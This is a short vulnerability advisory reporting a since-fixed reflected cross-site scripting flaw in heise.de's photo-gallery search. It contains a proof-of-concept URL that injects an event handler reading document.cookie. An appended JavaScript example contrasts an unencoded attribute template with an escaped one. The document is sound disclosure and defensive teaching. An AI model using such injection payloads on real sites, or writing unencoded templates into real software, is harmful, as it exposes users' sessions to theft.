Heise.de Cross Site Scripting

Date: 11 Jan 2013
Reported by: Stefan Schurtz
Type: packetstorm
Source: packetstormsecurity.com

heise.de Cross-site Scripting vulnerability, fixe

`
Advisory: heise.de - Cross-site Scripting vulnerability  
Advisory ID: SSCHADV2013-002  
Author: Stefan Schurtz  
Affected Software: Successfully tested on heise.de  
Vendor URL: http://www.heise.de  
Vendor Status: fixed  
  
==========================  
Vulnerability Description  
==========================  
  
http://www.heise.de is prone to an XSS vulnerability  
  
==========================  
PoC-Exploit  
==========================  
  
http://www.heise.de/foto/galerie/suche/photo/?suchwort="  
onMouseMove=alert(document.cookie) '  
  
==========================  
Solution  
==========================  
  
fixed  
  
==========================  
Disclosure Timeline  
==========================  
  
03-Jan-2013 - informed heise Security  
04-Jan-2012 - fixed by developer  
  
==========================  
Credits  
==========================  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
==========================  
References  
==========================  
  
http://www.darksecurity.de/advisories/2013/SSCHADV2013-002.tx  
`
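The PoC value opens with a double quote and then supplies an event-handler attribute, which is the shape of an injection into an HTML attribute value. The following is an added example, not part of the advisory and not heise.de's code: it assumes (the advisory does not say so) that `suchwort` was reflected into a double-quoted attribute, and the template, `escapeAttr` and the simplified tokenizer are hypothetical names used to show the unencoded output beside the encoded one.

```javascript
// Constructed sample: the URL-decoded `suchwort` value from the advisory's PoC.
const POC_TERM = '" onMouseMove=alert(document.cookie) \'';

// Hypothetical vulnerable template (assumption): the search term is
// concatenated into a double-quoted attribute without any encoding.
function renderVulnerable(term) {
  return '<input type="text" name="suchwort" value="' + term + '">';
}

// Encode every character that can end an attribute value or start markup.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened template: same markup, value passed through escapeAttr().
function renderHardened(term) {
  return '<input type="text" name="suchwort" value="' + escapeAttr(term) + '">';
}

// Simplified tokenizer for one start tag (not a full HTML parser): returns the
// well-formed attribute names found in the tag, lowercased.
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+/, '').replace(/>$/, '');
  const re = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Event-handler attributes present in the rendered tag.
function injectedHandlers(tag) {
  return attributeNames(tag).filter((n) => n.startsWith('on'));
}

for (const render of [renderVulnerable, renderHardened]) {
  const html = render(POC_TERM);
  console.log(render.name, '->', html);
  console.log('  event handlers:', injectedHandlers(html));
}
```

With encoding applied, the whole search term stays inside `value`, so the tag carries only the three attributes the template wrote.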
